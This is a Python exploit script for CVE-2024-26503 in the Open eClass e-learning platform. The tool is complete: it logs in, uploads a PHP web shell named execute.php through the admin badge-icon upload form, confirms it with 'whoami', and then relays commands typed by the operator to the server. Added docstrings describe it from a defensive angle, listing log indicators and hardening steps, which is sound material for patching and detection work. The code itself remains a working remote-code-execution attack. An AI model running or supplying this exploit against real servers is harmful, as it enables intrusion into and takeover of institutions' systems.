import requests
import argparse
# ANSI SGR escape sequences used to colour the script's terminal output.
# RESET switches the terminal back to its default attributes.
RESET = '\033[0m'
RED = '\033[91m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
ORANGE = '\033[38;5;208m'  # 256-colour palette entry 208
def banner():
    """Print the script's ASCII-art title and author line in colour.

    Purely cosmetic: writes to stdout and returns None.
    """
    # The art text is reproduced exactly as it appears in the listing.
    art = f'''{RED}
___ _ _ ____ ____ __ ____ ___ ____ ___ ___ __ ____
/ __)/ )( \\( __)___(___ \\ / \\(___ \\ / _ \\ ___(___ \\ / __) / __) / \\( __ \\
( (__ \\ \\/ / ) _)(___)/ __/( 0 )/ __/(__ ((___)/ __/( _ \\(___ \\( 0 )(__ (
\\___) \\__/ (____) (____) \\__/(____) (__/ (____) \\___/(____/ \\__/(____/
{YELLOW}
============================ Author: RoboGR00t ============================
{RESET} '''
    print(art)
def execute_command(openeclass):
    """Relay operator-typed commands to the uploaded ``execute.php`` file.

    Each line read from stdin is sent as the ``cmd`` query parameter of a
    GET request to ``/courses/user_progress_data/badge_templates/execute.php``
    under the base URL ``openeclass``; the response body is printed when the
    status is 200. Typing ``quit`` sends ``rm execute.php`` through the same
    endpoint and ends the loop.

    Review notes (defensive reading of this block):
      * The requests are made with plain ``requests.get`` -- no session or
        cookies from the earlier login are sent -- so the script itself does
        not authenticate to the uploaded file.
      * Every command travels in the URL query string, so web-server access
        logs that record the request line should show GETs to this path with
        a ``cmd=`` parameter.
      * The result of the clean-up request is not checked; the file may still
        be present after the script exits and should be verified and removed
        on the server side.
    """
    while True:
        # Prompt the operator with a coloured "[eClass]~#" prompt
        cmd = input(f"{RED}[{YELLOW}eClass{RED}]~# {RESET}")
        # 'quit' (case-insensitive) triggers clean-up and leaves the loop
        if cmd.lower() == "quit":
            print(f"{ORANGE}\nExiting... removing '{RED}execute.php{ORANGE}'{RESET}")
            # NOTE(review): response and exceptions are ignored here, so a
            # failed removal goes unnoticed.
            requests.get(f"{openeclass}/courses/user_progress_data/badge_templates/execute.php?cmd=rm execute.php")
            break
        # Build the URL with the operator-provided command as the query value
        url = f"{openeclass}/courses/user_progress_data/badge_templates/execute.php?cmd={cmd}"
        # Send the GET request
        try:
            response = requests.get(url)
            # Only a 200 response is shown; any other status is silently dropped
            if response.status_code == 200:
                # Print the response body
                print(f"{GREEN}{response.text}{RESET}")
        except requests.exceptions.RequestException as e:
            # Report transport-level errors and keep the loop running
            print(f"{RED}An error occurred: {e}{RESET}")
def upload_web_shell(openeclass, username, password):
    """Log in to Open eClass and submit a PHP file through the badge-icon form.

    Args:
        openeclass: Base URL of the Open eClass installation.
        username: Account name posted in the ``uname`` login field.
        password: Password posted in the ``pass`` login field.

    Returns None. Neither the login response nor the upload response is
    inspected, so the function cannot tell the caller whether either step
    worked.

    Review notes (defensive reading of this block):
      * The upload goes to ``/modules/admin/certbadge.php`` as a multipart
        form whose ``icon`` part is named ``execute.php`` and is declared as
        ``text/plain``. A server that accepts it is not enforcing an image
        type or extension on badge icons -- the "unrestricted file upload"
        named in this script's argparse description.
      * The rest of the script later requests the file under
        ``/courses/user_progress_data/badge_templates/``; unexpected ``.php``
        files in that directory are an indicator worth checking for.
      * NOTE(review): the endpoint lives under ``modules/admin/``, so this
        presumably requires an account with administrative rights -- confirm
        against the vendor advisory for CVE-2024-26503.
      * Typical hardening for this class of issue: validate upload type and
        extension server-side, store uploads where the web server does not
        execute PHP, and apply the vendor release that fixes the CVE.
    """
    login_url = f'{openeclass}/?login_page=1'
    login_page_url = f'{openeclass}/main/login_form.php?next=%2Fmain%2Fportfolio.php'
    # Login form fields
    payload = {
        'next': '/main/portfolio.php',
        'uname': f'{username}',
        'pass': f'{password}',
        'submit': 'Enter'
    }
    headers = {
        'Referer': login_page_url,
    }
    # Use a session so cookies set during login are sent with the upload
    with requests.Session() as session:
        # Visit the login page first to obtain a session cookie or any other required tokens
        session.get(login_page_url)
        # Post the login credentials (result is not checked)
        response = session.post(login_url, headers=headers, data=payload)
        url = f'{openeclass}/modules/admin/certbadge.php'
        # Multipart body: the 'icon' part carries the PHP file; the other
        # parts are empty form fields.
        files = {
            'icon': ('execute.php', '<?php echo shell_exec($_GET[\'cmd\']) ;?>', 'text/plain'),
            'name': (None, ''),
            'description': (None, ''),
            'submit_badge_icon': (None, '')
        }
        # Submit the form (result is not checked)
        response = session.post(url, files=files)
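def is_successfull(openeclass):
    """Report whether the uploaded ``execute.php`` answers with HTTP 200.

    Sends one GET request with ``cmd=whoami`` to
    ``/courses/user_progress_data/badge_templates/execute.php`` under the
    base URL ``openeclass``.

    Returns:
        True when the response status is 200, False otherwise -- including
        when the request raises (the original fell through and returned None
        in that case).

    NOTE(review): only the status code is examined; the response body is
    never checked, so a server that answers 200 for missing files would be
    reported as a success.
    """
    url = f"{openeclass}/courses/user_progress_data/badge_templates/execute.php?cmd=whoami"
    try:
        response = requests.get(url)
    except requests.exceptions.RequestException as e:
        # Transport-level failure: report it and give the caller a real bool
        print(f"An error occurred: {e}")
        return False
    if response.status_code == 200:
        return True
    print("EXPLOITATION FAILED")
    return False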
def main():
    """Parse the command line, then run upload, check and interactive loop.

    Requires three options: -u/--username, -p/--password and -e/--eclass
    (the base URL). The interactive loop starts only when
    ``is_successfull`` reports success.

    NOTE(review): the password is taken as a command-line argument, so it
    can end up in shell history and the process list.
    """
    parser = argparse.ArgumentParser(description="Open eClass – CVE-2024-26503: Unrestricted File Upload Leads to Remote Code Execution")
    required_options = (
        ('-u', '--username', "Username for login"),
        ('-p', '--password', "Password for login"),
        ('-e', '--eclass', "Base URL of the Open eClass"),
    )
    for short_flag, long_flag, help_text in required_options:
        parser.add_argument(short_flag, long_flag, required=True, help=help_text)
    args = parser.parse_args()

    banner()

    # Log in and submit the file, then check that it responds
    upload_web_shell(args.eclass, args.username, args.password)
    if not is_successfull(args.eclass):
        return
    execute_command(args.eclass)
# Run main() only when the file is executed as a script, not when imported.
if __name__ == "__main__":
    main()